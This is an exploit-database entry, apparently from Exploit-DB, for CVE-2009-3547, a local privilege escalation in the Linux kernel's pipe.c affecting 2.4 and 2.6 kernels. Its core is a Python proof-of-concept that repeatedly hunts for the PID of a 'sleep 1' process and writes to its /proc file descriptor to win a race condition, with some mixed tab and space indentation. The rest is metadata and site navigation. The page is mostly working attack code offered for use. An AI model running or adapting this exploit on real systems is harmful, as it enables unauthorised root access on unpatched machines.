Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)

EDB-ID:

9844

CVE:

2009-3547

EDB Verified:

Author:

Matthew Bergin

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2009-11-05

Vulnerable App: 
# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
# PoC by Matthew Bergin
# Bugtraq ID:       36901
#
# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files

import os
import time
import random
import subprocess
#infinite loop
i = 0
x = 0
while (i == 0):
        os.system("sleep 1")
        while (x == 0):
                time.sleep(random.random()) #random int 0.0-1.0
                p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
		result = p.stdout.read()
		pid = result.replace('\n', '').replace('\r', '')
                if (pid == "0"): #need an active pid, race condition applies
                        print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
                        break
                else:
                        print "[+] PID: " + pid
                        loc = "echo n > /proc/" + pid + "/fd/1"
                        os.system(loc) # triggers the fault, runs via sh
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services